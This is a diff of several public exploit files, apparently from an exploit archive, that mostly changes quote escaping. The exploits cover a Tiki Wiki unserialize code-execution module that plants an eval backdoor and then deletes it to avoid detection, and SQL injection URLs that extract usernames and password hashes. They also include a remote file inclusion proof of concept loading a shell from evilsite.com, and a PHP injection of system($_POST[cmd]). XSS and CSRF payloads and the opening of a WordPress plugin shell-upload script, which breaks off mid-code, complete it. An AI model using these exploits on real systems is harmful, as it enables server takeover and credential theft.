|
||||
'DisableNops' => true,
|
||||
},
|
||||
\'Targets\' => [ [\'Automatic\', {}] ],
|
||||
\'DefaultTarget\' => 0,
|
||||
\'DisclosureDate\' => \'Jul 04 2012\'
|
||||
'Targets' => [ ['Automatic', {}] ],
|
||||
'DefaultTarget' => 0,
|
||||
'DisclosureDate' => 'Jul 04 2012'
|
||||
))
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptString.new(\'TARGETURI\', [ true, \"The base path to the web application\", \"/tiki/\"])
|
||||
OptString.new('TARGETURI', [ true, "The base path to the web application", "/tiki/"])
|
||||
], self.class)
|
||||
end
|
||||
|
||||
|
||||
def on_new_session(client)
|
||||
if client.type == \"meterpreter\"
|
||||
client.core.use(\"stdapi\") if not client.ext.aliases.include?(\"stdapi\")
|
||||
if client.type == "meterpreter"
|
||||
client.core.use("stdapi") if not client.ext.aliases.include?("stdapi")
|
||||
begin
|
||||
client.fs.file.rm(@upload_php)
|
||||
print_good(\"#{@peer} - #{@upload_php} removed to stay ninja\")
|
||||
print_good("#{@peer} - #{@upload_php} removed to stay ninja")
|
||||
rescue
|
||||
print_error(\"#{@peer} - Unable to remove #{f}\")
|
||||
print_error("#{@peer} - Unable to remove #{f}")
|
||||
end
|
||||
end
|
||||
end
|
||||
|
||||
def exploit
|
||||
base = target_uri.path
|
||||
base << \'/\' if base[-1, 1] != \'/\'
|
||||
@upload_php = rand_text_alpha(rand(4) + 4) + \".php\"
|
||||
@peer = \"#{rhost}:#{rport}\"
|
||||
base << '/' if base[-1, 1] != '/'
|
||||
@upload_php = rand_text_alpha(rand(4) + 4) + ".php"
|
||||
@peer = "#{rhost}:#{rport}"
|
||||
|
||||
print_status(\"#{@peer} - Disclosing the path of the Tiki Wiki on the filesystem\")
|
||||
print_status("#{@peer} - Disclosing the path of the Tiki Wiki on the filesystem")
|
||||
|
||||
res = send_request_cgi(
|
||||
\'uri\' => \"#{base}tiki-rss_error.php\"
|
||||
'uri' => "#{base}tiki-rss_error.php"
|
||||
)
|
||||
|
||||
if not res or res.code != 200 or not res.body =~ /[> ](\\/.*)tiki-rss_error\\.php/
|
||||
print_error \"Tiki Wiki path couldn\'t be disclosed. The php setting \'display_errors\' must be On.\"
|
||||
if not res or res.code != 200 or not res.body =~ /[> ](\/.*)tiki-rss_error\.php/
|
||||
print_error "Tiki Wiki path couldn't be disclosed. The php setting 'display_errors' must be On."
|
||||
return
|
||||
else
|
||||
tiki_path = $1
|
||||
print_good \"#{@peer} - Tiki Wiki path disclosure: #{tiki_path}\"
|
||||
print_good "#{@peer} - Tiki Wiki path disclosure: #{tiki_path}"
|
||||
end
|
||||
|
||||
php_payload = \"<?php eval(base64_decode($_SERVER[HTTP_CMD])); ?>\"
|
||||
php_payload = "<?php eval(base64_decode($_SERVER[HTTP_CMD])); ?>"
|
||||
|
||||
printpages = \"O:29:\\\"Zend_Pdf_ElementFactory_Proxy\\\":1:\"
|
||||
printpages << \"{s:39:\\\"%00Zend_Pdf_ElementFactory_Proxy%00_factory\\\";O:51:\\\"Zend_Search_Lucene_Index_SegmentWriter_StreamWriter\\\":5:\"
|
||||
printpages << \"{s:12:\\\"%00*%00_docCount\\\";i:1;s:8:\\\"%00*%00_name\\\";s:3:\\\"foo\\\";s:13:\\\"%00*%00_directory\\\";O:47:\\\"Zend_Search_Lucene_Storage_Directory_Filesystem\\\":1:\"
|
||||
printpages << \"{s:11:\\\"%00*%00_dirPath\\\";s:#{tiki_path.length + @upload_php.length + 1}:\\\"#{tiki_path + @upload_php}%00\\\";}\"
|
||||
printpages << \"s:10:\\\"%00*%00_fields\\\";a:1:\"
|
||||
printpages << \"{i:0;O:34:\\\"Zend_Search_Lucene_Index_FieldInfo\\\":1:\"
|
||||
printpages << \"{s:4:\\\"name\\\";s:#{php_payload.length}:\\\"#{php_payload}\\\";}}\"
|
||||
printpages << \"s:9:\\\"%00*%00_files\\\";O:8:\\\"stdClass\\\":0:{}}}\"
|
||||
printpages = "O:29:\"Zend_Pdf_ElementFactory_Proxy\":1:"
|
||||
printpages << "{s:39:\"%00Zend_Pdf_ElementFactory_Proxy%00_factory\";O:51:\"Zend_Search_Lucene_Index_SegmentWriter_StreamWriter\":5:"
|
||||
printpages << "{s:12:\"%00*%00_docCount\";i:1;s:8:\"%00*%00_name\";s:3:\"foo\";s:13:\"%00*%00_directory\";O:47:\"Zend_Search_Lucene_Storage_Directory_Filesystem\":1:"
|
||||
printpages << "{s:11:\"%00*%00_dirPath\";s:#{tiki_path.length + @upload_php.length + 1}:\"#{tiki_path + @upload_php}%00\";}"
|
||||
printpages << "s:10:\"%00*%00_fields\";a:1:"
|
||||
printpages << "{i:0;O:34:\"Zend_Search_Lucene_Index_FieldInfo\":1:"
|
||||
printpages << "{s:4:\"name\";s:#{php_payload.length}:\"#{php_payload}\";}}"
|
||||
printpages << "s:9:\"%00*%00_files\";O:8:\"stdClass\":0:{}}}"
|
||||
|
||||
print_status(\"#{@peer} - Exploiting the unserialize() to upload PHP code\")
|
||||
print_status("#{@peer} - Exploiting the unserialize() to upload PHP code")
|
||||
|
||||
res = send_request_cgi(
|
||||
{
|
||||
\'uri\' => \"#{base}tiki-print_multi_pages.php\",
|
||||
\'method\' => \'POST\',
|
||||
\'vars_post\' => {
|
||||
\'printpages\' => printpages
|
||||
'uri' => "#{base}tiki-print_multi_pages.php",
|
||||
'method' => 'POST',
|
||||
'vars_post' => {
|
||||
'printpages' => printpages
|
||||
}
|
||||
})
|
||||
|
||||
if not res or res.code != 200
|
||||
print_error(\"#{@peer} - Exploit failed: #{res.code}. The Tiki Wiki Multiprint feature must be enabled.\")
|
||||
print_error("#{@peer} - Exploit failed: #{res.code}. The Tiki Wiki Multiprint feature must be enabled.")
|
||||
return
|
||||
end
|
||||
|
||||
print_status(\"#{@peer} - Executing the payload #{@upload_php}\")
|
||||
print_status("#{@peer} - Executing the payload #{@upload_php}")
|
||||
|
||||
res = send_request_cgi(
|
||||
{
|
||||
\'method\' => \'GET\',
|
||||
\'uri\' => \"#{base + @upload_php}\",
|
||||
\'headers\' => {
|
||||
\'Cmd\' => Rex::Text.encode_base64(payload.encoded)
|
||||
'method' => 'GET',
|
||||
'uri' => "#{base + @upload_php}",
|
||||
'headers' => {
|
||||
'Cmd' => Rex::Text.encode_base64(payload.encoded)
|
||||
}
|
||||
})
|
||||
|
||||
if res
|
||||
print_error(\"#{@peer} - Payload execution failed: #{res.code}\")
|
||||
print_error("#{@peer} - Payload execution failed: #{res.code}")
|
||||
return
|
||||
end
|
||||
|
||||
|
|
|
@ -10,16 +10,16 @@ Vulnerable: smartsite cms v1.0
|
|||
vulnerable code:
|
||||
----------------------
|
||||
1-in comment.php :
|
||||
require($root . \"include/inc_foot.php\");
|
||||
require($root . "include/inc_foot.php");
|
||||
---------------------------------------
|
||||
2-in /admin/test.php :
|
||||
require($root . \"include/inc_adminfooter.php\");
|
||||
require($root . "include/inc_adminfooter.php");
|
||||
---------------------------------------
|
||||
3-in /admin/index.php :
|
||||
require($root . \"admin/include/inc_adminfooter.php\");
|
||||
require($root . "admin/include/inc_adminfooter.php");
|
||||
---------------------------------------
|
||||
4-in /admin/include/inc_adminfoot.php:
|
||||
require($root . \"include/inc_footer.php\");
|
||||
require($root . "include/inc_footer.php");
|
||||
---------------------------------------
|
||||
$root parameter File include
|
||||
-----------------------------------------------------------------------------------------------------------------------------------------
|
||||
|
|
|
@ -1,6 +1,6 @@
|
|||
#!/usr/bin/python
|
||||
|
||||
\'\'\'
|
||||
'''
|
||||
|
||||
# Exploit Title: T-dah Webmail Multiple Stored XSS issues.
|
||||
# Date: 17/08/2012
|
||||
|
@ -26,11 +26,11 @@ Vulnerability Description
|
|||
Send an email to the victim with the payload in the e-mail body.
|
||||
XSS Will be triggered when the user clicks the link.
|
||||
|
||||
XSS Payload: <a href=javascript:alert(\"XSS\")>Click Me</a>
|
||||
XSS Payload: <a href=javascript:alert("XSS")>Click Me</a>
|
||||
|
||||
2. Stored XSS in email body (Previously Discovered by loneferret - http://www.exploit-db.com/exploits/20364/).
|
||||
|
||||
XSS Payload: <img src=\'1.jpg\'onerror=javascript:alert(\"XSS\")>
|
||||
XSS Payload: <img src='1.jpg'onerror=javascript:alert("XSS")>
|
||||
|
||||
Send an email to the victim with the payload in the email body, once the user opens the message XSS should be triggered.
|
||||
|
||||
|
@ -38,48 +38,48 @@ Send an email to the victim with the payload in the email body, once the user op
|
|||
3. Stored XSS contacts.
|
||||
|
||||
Another stored XSS can be triggered when crating a new contact, almost every field in the form is vulnerable
|
||||
for example you can inject your payload <img src=\'1.jpg\'onerror=javascript:alert(\"XSS\")> in the \"Name\" field, Save contact, XSS Shoud be triggerd.
|
||||
for example you can inject your payload <img src='1.jpg'onerror=javascript:alert("XSS")> in the "Name" field, Save contact, XSS Shoud be triggerd.
|
||||
|
||||
4. Stored XSS in Calendar
|
||||
|
||||
Add a new event to calendar and in the message field insert the javascript payload: <img src=\'1.jpg\'onerror=javascript:alert(\"XSS\")>
|
||||
Add a new event to calendar and in the message field insert the javascript payload: <img src='1.jpg'onerror=javascript:alert("XSS")>
|
||||
Save the event, XSS Should be truggered.
|
||||
|
||||
|
||||
\'\'\'
|
||||
'''
|
||||
|
||||
import smtplib
|
||||
|
||||
print \"###############################################\"
|
||||
print \"# T-dah Webmail 3.2.0 Stored XSS POC #\"
|
||||
print \"# Coded by: Shai rod #\"
|
||||
print \"# @NightRang3r #\"
|
||||
print \"# http://exploit.co.il #\"
|
||||
print \"# For Educational Purposes Only! #\"
|
||||
print \"###############################################\\r\\n\"
|
||||
print "###############################################"
|
||||
print "# T-dah Webmail 3.2.0 Stored XSS POC #"
|
||||
print "# Coded by: Shai rod #"
|
||||
print "# @NightRang3r #"
|
||||
print "# http://exploit.co.il #"
|
||||
print "# For Educational Purposes Only! #"
|
||||
print "###############################################\r\n"
|
||||
|
||||
# SETTINGS
|
||||
|
||||
sender = \"attacker@localhost\"
|
||||
sender = "attacker@localhost"
|
||||
smtp_login = sender
|
||||
smtp_password = \"qwe123\"
|
||||
recipient = \"victim@localhost\"
|
||||
smtp_server = \"192.168.1.10\"
|
||||
smtp_password = "qwe123"
|
||||
recipient = "victim@localhost"
|
||||
smtp_server = "192.168.1.10"
|
||||
smtp_port = 25
|
||||
subject = \"T-dah Webmail XSS POC\"
|
||||
subject = "T-dah Webmail XSS POC"
|
||||
|
||||
# SEND E-MAIL
|
||||
|
||||
print \"[*] Sending E-mail to \" + recipient + \"...\"
|
||||
msg = (\"From: %s\\r\\nTo: %s\\r\\nSubject: %s\\n\"
|
||||
% (sender, \", \".join(recipient), subject) )
|
||||
msg += \"Content-type: text/html\\n\\n\"
|
||||
msg += \"\"\"<img src=\'1.jpg\'onerror=javascript:alert(\"XSS-1\")>\\r\\n\"\"\"
|
||||
msg += \"\"\"<a href=javascript:alert(\"XSS-2\")>Click Me, Please...</a>\\r\\n\"\"\"
|
||||
print "[*] Sending E-mail to " + recipient + "..."
|
||||
msg = ("From: %s\r\nTo: %s\r\nSubject: %s\n"
|
||||
% (sender, ", ".join(recipient), subject) )
|
||||
msg += "Content-type: text/html\n\n"
|
||||
msg += """<img src='1.jpg'onerror=javascript:alert("XSS-1")>\r\n"""
|
||||
msg += """<a href=javascript:alert("XSS-2")>Click Me, Please...</a>\r\n"""
|
||||
server = smtplib.SMTP(smtp_server, smtp_port)
|
||||
server.ehlo()
|
||||
server.starttls()
|
||||
server.login(smtp_login, smtp_password)
|
||||
server.sendmail(sender, recipient, msg)
|
||||
server.quit()
|
||||
print \"[+] E-mail sent!\"
|
||||
print "[+] E-mail sent!"
|
||||
|
|
|
@ -2,16 +2,16 @@
|
|||
# Author : By onestree
|
||||
# Software Link : http://code.google.com/p/phpshop/downloads/list
|
||||
# tested : windows 7 / ubuntu
|
||||
# Dork : inurl:\"tanyakan pada rumput yang bergoyang\"
|
||||
# Dork : inurl:"tanyakan pada rumput yang bergoyang"
|
||||
|
||||
SQLi p0c:
|
||||
|
||||
==================
|
||||
|
||||
http://localhost/phpshop 2.0/?page=admin/function_list&module_id=11\'
|
||||
http://localhost/phpshop 2.0/?page=admin/function_list&module_id=11'
|
||||
union select 1,database(),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 --
|
||||
|
||||
http://localhost/phpshop 2.0/?page=shop/flypage&product_id=1087\'/**/union/**/select/**/1,1,1,1,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,username/**/from/**/auth_user_md5--
|
||||
http://localhost/phpshop 2.0/?page=shop/flypage&product_id=1087'/**/union/**/select/**/1,1,1,1,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,username/**/from/**/auth_user_md5--
|
||||
|
||||
|
||||
|
||||
|
|
|
@ -4,7 +4,7 @@
|
|||
+ Vendor ............: http://www.irokez.org/
|
||||
+ Affected Software .: Irokez CMS <= 0.7.1
|
||||
+ Download ..........: http://www.irokez.org/releases/irokez-0.7.1.zip
|
||||
+ Description .......: \"Irokez is a blogging based CMS\"
|
||||
+ Description .......: "Irokez is a blogging based CMS"
|
||||
+ Class .............: Remote File Inclusion
|
||||
+ Risk ..............: High (Remote File Execution)
|
||||
+ Found By ..........: nuffsaid <nuffsaid[at]newbslove.us>
|
||||
|
@ -16,33 +16,33 @@
|
|||
+
|
||||
+ Vulnerable Code:
|
||||
+ scripts/gallery.scr.php, line(s) 11-12:
|
||||
+ -> 11: require_once \"{$GLOBALS[\'PTH\'][\'func\']}gallery.func.php\";
|
||||
+ -> 12: require_once \"{$GLOBALS[\'PTH\'][\'classes\']}gallery.class.php\";
|
||||
+ -> 11: require_once "{$GLOBALS['PTH']['func']}gallery.func.php";
|
||||
+ -> 12: require_once "{$GLOBALS['PTH']['classes']}gallery.class.php";
|
||||
+ scripts/sitemap.scr.php, line(s) 13:
|
||||
+ -> 13: include_once $GLOBALS[\'PTH\'][\'classes\'] . \'menu.class.php\';
|
||||
+ -> 13: include_once $GLOBALS['PTH']['classes'] . 'menu.class.php';
|
||||
+ scripts/news.scr.php, line(s) 11:
|
||||
+ -> 11: require_once $GLOBALS[\'PTH\'][\'classes\'] . \'news.class.php\';
|
||||
+ -> 11: require_once $GLOBALS['PTH']['classes'] . 'news.class.php';
|
||||
+ scripts/polls.scr.php, line(s) 03:
|
||||
+ -> 03: require_once $GLOBALS[\'PTH\'][\'classes\'] . \'poll.class.php\';
|
||||
+ -> 03: require_once $GLOBALS['PTH']['classes'] . 'poll.class.php';
|
||||
+ scripts/rss.scr.php, line(s) 04:
|
||||
+ -> 04: require_once \"{$GLOBALS[\'PTH\'][\'classes\']}news.class.php\";
|
||||
+ -> 04: require_once "{$GLOBALS['PTH']['classes']}news.class.php";
|
||||
+ scripts/search.scr.php, line(s) 04:
|
||||
+ -> 04: require_once \"{$GLOBALS[\'PTH\'][\'classes\']}content.class.php\";
|
||||
+ -> 04: require_once "{$GLOBALS['PTH']['classes']}content.class.php";
|
||||
+ scripts/xtextarea.scr.php, line(s) 03-04:
|
||||
+ -> 03: $GLOBALS[\'spaw_root\'] = $spaw_root = $GLOBALS[\'PTH\'][\'spaw\'];
|
||||
+ -> 04: require_once $GLOBALS[\'PTH\'][\'spaw\'] . \'spaw_control.class.php\';
|
||||
+ -> 03: $GLOBALS['spaw_root'] = $spaw_root = $GLOBALS['PTH']['spaw'];
|
||||
+ -> 04: require_once $GLOBALS['PTH']['spaw'] . 'spaw_control.class.php';
|
||||
+ functions/form.func.php, line(s) 03:
|
||||
+ -> 03: require_once \"{$GLOBALS[\'PTH\'][\'classes\']}lang.class.php\";
|
||||
+ -> 03: require_once "{$GLOBALS['PTH']['classes']}lang.class.php";
|
||||
+ functions/general.func.php, line(s) 06:
|
||||
+ -> 06: require_once \"{$GLOBALS[\'PTH\'][\'classes\']}lang.class.php\"; //TBL_Lang description
|
||||
+ -> 06: require_once "{$GLOBALS['PTH']['classes']}lang.class.php"; //TBL_Lang description
|
||||
+ functions/groups.func.php, line(s) 03:
|
||||
+ -> 03: require_once \"{$GLOBALS[\'PTH\'][\'classes\']}group.class.php\";
|
||||
+ -> 03: require_once "{$GLOBALS['PTH']['classes']}group.class.php";
|
||||
+ functions/js.func.php, line(s) 04:
|
||||
+ -> 04: require_once \"{$GLOBALS[\'PTH\'][\'classes\']}lang.class.php\";
|
||||
+ -> 04: require_once "{$GLOBALS['PTH']['classes']}lang.class.php";
|
||||
+ functions/sections.func.php, line(s) 03:
|
||||
+ -> 03: require_once \"{$GLOBALS[\'PTH\'][\'classes\']}section.class.php\";
|
||||
+ -> 03: require_once "{$GLOBALS['PTH']['classes']}section.class.php";
|
||||
+ functions/users.func.php, line(s) 03:
|
||||
+ -> 03: require_once \"{$GLOBALS[\'PTH\'][\'classes\']}user.class.php\";
|
||||
+ -> 03: require_once "{$GLOBALS['PTH']['classes']}user.class.php";
|
||||
+
|
||||
+ Proof Of Concept:
|
||||
+ http://[target]/[path]/scripts/gallery.scr.php?GLOBALS[PTH][func]=http://evilsite.com/shell.php?
|
||||
|
|
|
@ -6,4 +6,4 @@ Exploiting these issues could allow an attacker to compromise the application, a
|
|||
|
||||
LANAI CMS 1.2.14 is vulnerable; other versions may also be affected.
|
||||
|
||||
http://www.example.com/module.php?modname=ezshopingcart&ac=c&cid=1/**/AND/**/1=2/**/UNION/**/ALL/**/SELECT/**/1,2,concat(userLogin,\'-\',userPassword),4,5/**/FROM/**/tbl_ln_user/*
|
||||
http://www.example.com/module.php?modname=ezshopingcart&ac=c&cid=1/**/AND/**/1=2/**/UNION/**/ALL/**/SELECT/**/1,2,concat(userLogin,'-',userPassword),4,5/**/FROM/**/tbl_ln_user/*
|
|
@ -1,5 +1,5 @@
|
|||
# Exploit Title: Sphider 1.3.6 or later SQL Injection
|
||||
# Google Dork: intitle:\"Sphider Admin Login\"
|
||||
# Google Dork: intitle:"Sphider Admin Login"
|
||||
# Date: 1 July 2014
|
||||
# Exploit Author: Mike Manzotti
|
||||
# Vendor Homepage: http://www.sphider.eu/
|
||||
|
@ -11,12 +11,12 @@ The web application is vulnerable to SQLi. Once a website has been indexed with
|
|||
|
||||
Proof of Concept:
|
||||
Response: POST: /admin/admin.php
|
||||
per_page=10&filter=\'union+select+1,@@version+;#&start=1&site_id=1&f=21
|
||||
per_page=10&filter='union+select+1,@@version+;#&start=1&site_id=1&f=21
|
||||
|
||||
Response:
|
||||
<tr class=\"grey\">
|
||||
<td><a href=\"5.5.35-0+wheezy1\">5.5.35-0+wheezy1</a></td>
|
||||
<td width=\"8%\">
|
||||
<tr class="grey">
|
||||
<td><a href="5.5.35-0+wheezy1">5.5.35-0+wheezy1</a></td>
|
||||
<td width="8%">
|
||||
[cid:image001.jpg@01CFAA73.0B6B8330]
|
||||
|
||||
|
||||
|
@ -24,13 +24,13 @@ Response:
|
|||
# Exploit Title: Sphider 1.3.6 or later PHP Injection
|
||||
|
||||
Description:
|
||||
An authenticated user can inject PHP code in configuration settings. This would allow an attacker to take full control of the server. Note that in v1.3.5 authentication can be bypassed. Also note that this issue depends on permissions of \"conf.php file\". However during the installation the user is advised to change the permissions of \"conf.php\" file to chmod 666.
|
||||
An authenticated user can inject PHP code in configuration settings. This would allow an attacker to take full control of the server. Note that in v1.3.5 authentication can be bypassed. Also note that this issue depends on permissions of "conf.php file". However during the installation the user is advised to change the permissions of "conf.php" file to chmod 666.
|
||||
|
||||
Proof of Concept:
|
||||
Request: POST /admin/admin.php
|
||||
f=settings&Submit=1&_version_nr=1.3.5&_language=en&_template=standard&_admin_email=admin%40localhost&_print_results=1&_tmp_dir=tmp&_log_dir=log&_log_format=html&_min_words_per_page=10&_min_word_length=3&_word_upper_bound=100;system($_POST[cmd])&_index_numbers=1&_index_meta_keywords=1&_pdftotext_path=c%3A%5Ctemp%5Cpdftotext.exe&_catdoc_path=c%3A%5Ctemp%5Ccatdoc.exe&_xls2csv_path=c%3A%5Ctemp%5Cxls2csv&_catppt_path=c%3A%5Ctemp%5Ccatppt&_user_agent=Sphider&_min_delay=0&_strip_sessids=1&_results_per_page=10&_cat_columns=2&_bound_search_result=0&_length_of_link_desc=0&_links_to_next=9&_show_meta_description=1&_show_query_scores=1&_show_categories=1&_desc_length=250&_did_you_mean_enabled=1&_suggest_enabled=1&_suggest_history=1&_suggest_rows=10&_title_weight=20&_domain_weight=60&_path_weight=10&_meta_weight=5
|
||||
|
||||
\"system($_POST[cmd])\" has been injected.
|
||||
"system($_POST[cmd])" has been injected.
|
||||
|
||||
Request: POST http://URL/sphider/settings/conf.php
|
||||
cmd=pwd
|
||||
|
@ -49,7 +49,7 @@ Request: POST /admin/admin.php
|
|||
f=7&parent=&category=<script>alert(document.cookie)</script>
|
||||
|
||||
Response
|
||||
<a href=\"admin.php?f=edit_cat&cat_id=1\">
|
||||
<a href="admin.php?f=edit_cat&cat_id=1">
|
||||
<script>alert(document.cookie)
|
||||
</script>
|
||||
</a>
|
||||
|
@ -57,10 +57,10 @@ Response
|
|||
Reflected XSS:
|
||||
|
||||
Request: POST /sphider/admin/admin.php
|
||||
f=index&adv=1&url=\"/><script>alert(document.cookie)</script>
|
||||
f=index&adv=1&url="/><script>alert(document.cookie)</script>
|
||||
|
||||
Response:
|
||||
<a href=\"admin.php?f=edit_cat&cat_id=1\">
|
||||
<a href="admin.php?f=edit_cat&cat_id=1">
|
||||
<script>alert(document.cookie)
|
||||
</script>
|
||||
</a>
|
||||
|
|
|
@ -6,26 +6,26 @@ An attacker may leverage these issues to execute arbitrary script code in the br
|
|||
|
||||
TaskFreak! 0.6.4 is vulnerable; other versions may also be affected.
|
||||
|
||||
<script type=\"text/javascript\">function xss(){document.forms[\"zappa\"].submit();}</script>
|
||||
<script type="text/javascript">function xss(){document.forms["zappa"].submit();}</script>
|
||||
|
||||
<form name=\"zappa\" action=\"http://taskfreak/index.php\" method=\"POST\" id=\"zappa\">
|
||||
<form name="zappa" action="http://taskfreak/index.php" method="POST" id="zappa">
|
||||
|
||||
<input type=\"hidden\" name=\"sProject\" value=\"0\" />
|
||||
<input type="hidden" name="sProject" value="0" />
|
||||
|
||||
<input type=\"hidden\" name=\"id\" value=\"\" />
|
||||
<input type="hidden" name="id" value="" />
|
||||
|
||||
<input type=\"hidden\" name=\"mode\" value=\"save\" />
|
||||
<input type="hidden" name="mode" value="save" />
|
||||
|
||||
<input type=\"hidden\" name=\"sContext\" value=\'%22%20onmouseover%3dprompt(/_did_you_smiled_today_?/)%20\' />
|
||||
<input type="hidden" name="sContext" value='%22%20onmouseover%3dprompt(/_did_you_smiled_today_?/)%20' />
|
||||
|
||||
<input type=\"hidden\" name=\"sort\" value=\'\"><script>alert(1)</script>\' />
|
||||
<input type="hidden" name="sort" value='"><script>alert(1)</script>' />
|
||||
|
||||
<input type=\"hidden\" name=\"dir\" value=\'\"><script>alert(2)</script>\' />
|
||||
<input type="hidden" name="dir" value='"><script>alert(2)</script>' />
|
||||
|
||||
<input type=\"hidden\" name=\"show\" value=\'\"><script>alert(3)</script>\' />
|
||||
<input type="hidden" name="show" value='"><script>alert(3)</script>' />
|
||||
|
||||
</form>
|
||||
|
||||
<a href=\"javascript: xss();\" style=\"text-decoration:none\">
|
||||
<a href="javascript: xss();" style="text-decoration:none">
|
||||
|
||||
<b><font color=\"red\"><center><h3>Exploit!<h3></center></font></b></a>
|
||||
<b><font color="red"><center><h3>Exploit!<h3></center></font></b></a>
|
||||
|
|
|
@ -8,7 +8,7 @@ TaskFreak! 0.6.4 is vulnerable; other versions may also be affected.
|
|||
|
||||
GET /taskfreak/rss.php HTTP/1.1
|
||||
|
||||
Referer: \">Waddup!
|
||||
Referer: ">Waddup!
|
||||
|
||||
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
|
||||
|
||||
|
|
|
@ -19,39 +19,39 @@
|
|||
#
|
||||
# --------------------------------------------------------------------
|
||||
#
|
||||
# The upload function located on \"/wp-symposium/server/file_upload_form.php \" is protected:
|
||||
# The upload function located on "/wp-symposium/server/file_upload_form.php " is protected:
|
||||
#
|
||||
# if ($_FILES[\"file\"][\"error\"] > 0) {
|
||||
# echo \"Error: \" . $_FILES[\"file\"][\"error\"] . \"<br>\";
|
||||
# if ($_FILES["file"]["error"] > 0) {
|
||||
# echo "Error: " . $_FILES["file"]["error"] . "<br>";
|
||||
# } else {
|
||||
# $allowedExts = \',\'.get_option(WPS_OPTIONS_PREFIX.\'_image_ext\').\',\'.get_option(WPS_OPTIONS_PREFIX.\'_doc_ext\').\',\'.get_option(WPS_OPTIONS_PREFIX.\'_video_ext\');
|
||||
# //echo \"Upload: \" . $_FILES[\"file\"][\"name\"] . \"<br>\";
|
||||
# $ext = pathinfo($_FILES[\"file\"][\"name\"], PATHINFO_EXTENSION);
|
||||
# //echo \"Extension: \" . $ext . \"<br />\";
|
||||
# $allowedExts = ','.get_option(WPS_OPTIONS_PREFIX.'_image_ext').','.get_option(WPS_OPTIONS_PREFIX.'_doc_ext').','.get_option(WPS_OPTIONS_PREFIX.'_video_ext');
|
||||
# //echo "Upload: " . $_FILES["file"]["name"] . "<br>";
|
||||
# $ext = pathinfo($_FILES["file"]["name"], PATHINFO_EXTENSION);
|
||||
# //echo "Extension: " . $ext . "<br />";
|
||||
# if (strpos($allowedExts, $ext)) {
|
||||
# $extAllowed = true;
|
||||
# } else {
|
||||
# $extAllowed = false;
|
||||
# }
|
||||
# //echo \"Type: \" . $_FILES[\"file\"][\"type\"] . \"<br>\";
|
||||
# //echo \"Size: \" . ($_FILES[\"file\"][\"size\"] / 1024) . \" kB<br>\";
|
||||
# //echo \"Stored in: \" . $_FILES[\"file\"][\"tmp_name\"];
|
||||
# //echo "Type: " . $_FILES["file"]["type"] . "<br>";
|
||||
# //echo "Size: " . ($_FILES["file"]["size"] / 1024) . " kB<br>";
|
||||
# //echo "Stored in: " . $_FILES["file"]["tmp_name"];
|
||||
#
|
||||
# if (!$extAllowed) {
|
||||
# echo __(\'Sorry, file type not allowed.\', WPS_TEXT_DOMAIN);
|
||||
# echo __('Sorry, file type not allowed.', WPS_TEXT_DOMAIN);
|
||||
# } else {
|
||||
# // Copy file to tmp location
|
||||
# ...
|
||||
# ...
|
||||
# ...
|
||||
#
|
||||
# BUTTTTT \"/wp-symposium/server/php/index.php\" is not protected and \"/wp-symposium/server/php/UploadHandler.php\" allow any extension
|
||||
# BUTTTTT "/wp-symposium/server/php/index.php" is not protected and "/wp-symposium/server/php/UploadHandler.php" allow any extension
|
||||
#
|
||||
# The same vulnerable files are locate in \"/wp-symposium/mobile-files/server/php/\"
|
||||
# The same vulnerable files are locate in "/wp-symposium/mobile-files/server/php/"
|
||||
#
|
||||
# ---------------------------------------------------------------------
|
||||
#
|
||||
# Dork google: index of \"wp-symposium\"
|
||||
# Dork google: index of "wp-symposium"
|
||||
#
|
||||
#
|
||||
# Tested on BackBox 3.x with python 2.6
|
||||
|
@ -69,8 +69,8 @@ import os, os.path, mimetypes
|
|||
|
||||
# Check url
|
||||
def checkurl(url):
|
||||
if url[:8] != \"https://\" and url[:7] != \"http://\":
|
||||
print(\'[X] You must insert http:// or https:// procotol\')
|
||||
if url[:8] != "https://" and url[:7] != "http://":
|
||||
print('[X] You must insert http:// or https:// procotol')
|
||||
sys.exit(1)
|
||||
else:
|
||||
return url
|
||||
|
@ -78,62 +78,62 @@ def checkurl(url):
|
|||
# Check if file exists and has readable
|
||||
def checkfile(file):
|
||||
if not os.path.isfile(file) and not os.access(file, os.R_OK):
|
||||
print \'[X] \'+file+\' file is missing or not readable\'
|
||||
print '[X] '+file+' file is missing or not readable'
|
||||
sys.exit(1)
|
||||
else:
|
||||
return file
|
||||
# Get file\'s mimetype
|
||||
# Get file's mimetype
|
||||
def get_content_type(filename):
|
||||
return mimetypes.guess_type(filename)[0] or \'application/octet-stream\'
|
||||
return mimetypes.guess_type(filename)[0] or 'application/octet-stream'
|
||||
|
||||
def id_generator(size=6, chars=string.ascii_uppercase + string.ascii_lowercase + string.digits):
|
||||
return \'\'.join(random.choice(chars) for _ in range(size))
|
||||
return ''.join(random.choice(chars) for _ in range(size))
|
||||
|
||||
# Create multipart header
|
||||
def create_body_sh3ll_upl04d(payloadname, randDirName, randShellName):
|
||||
|
||||
getfields = dict()
|
||||
getfields[\'uploader_uid\'] = \'1\'
|
||||
getfields[\'uploader_dir\'] = \'./\'+randDirName
|
||||
getfields[\'uploader_url\'] = url_symposium_upload
|
||||
getfields['uploader_uid'] = '1'
|
||||
getfields['uploader_dir'] = './'+randDirName
|
||||
getfields['uploader_url'] = url_symposium_upload
|
||||
|
||||
payloadcontent = open(payloadname).read()
|
||||
|
||||
LIMIT = \'----------lImIt_of_THE_fIle_eW_$\'
|
||||
CRLF = \'\\r\\n\'
|
||||
LIMIT = '----------lImIt_of_THE_fIle_eW_$'
|
||||
CRLF = '\r\n'
|
||||
|
||||
L = []
|
||||
for (key, value) in getfields.items():
|
||||
L.append(\'--\' + LIMIT)
|
||||
L.append(\'Content-Disposition: form-data; name=\"%s\"\' % key)
|
||||
L.append(\'\')
|
||||
L.append('--' + LIMIT)
|
||||
L.append('Content-Disposition: form-data; name="%s"' % key)
|
||||
L.append('')
|
||||
L.append(value)
|
||||
|
||||
L.append(\'--\' + LIMIT)
|
||||
L.append(\'Content-Disposition: form-data; name=\"%s\"; filename=\"%s\"\' % (\'files[]\', randShellName+\".php\"))
|
||||
L.append(\'Content-Type: %s\' % get_content_type(payloadname))
|
||||
L.append(\'\')
|
||||
L.append('--' + LIMIT)
|
||||
L.append('Content-Disposition: form-data; name="%s"; filename="%s"' % ('files[]', randShellName+".php"))
|
||||
L.append('Content-Type: %s' % get_content_type(payloadname))
|
||||
L.append('')
|
||||
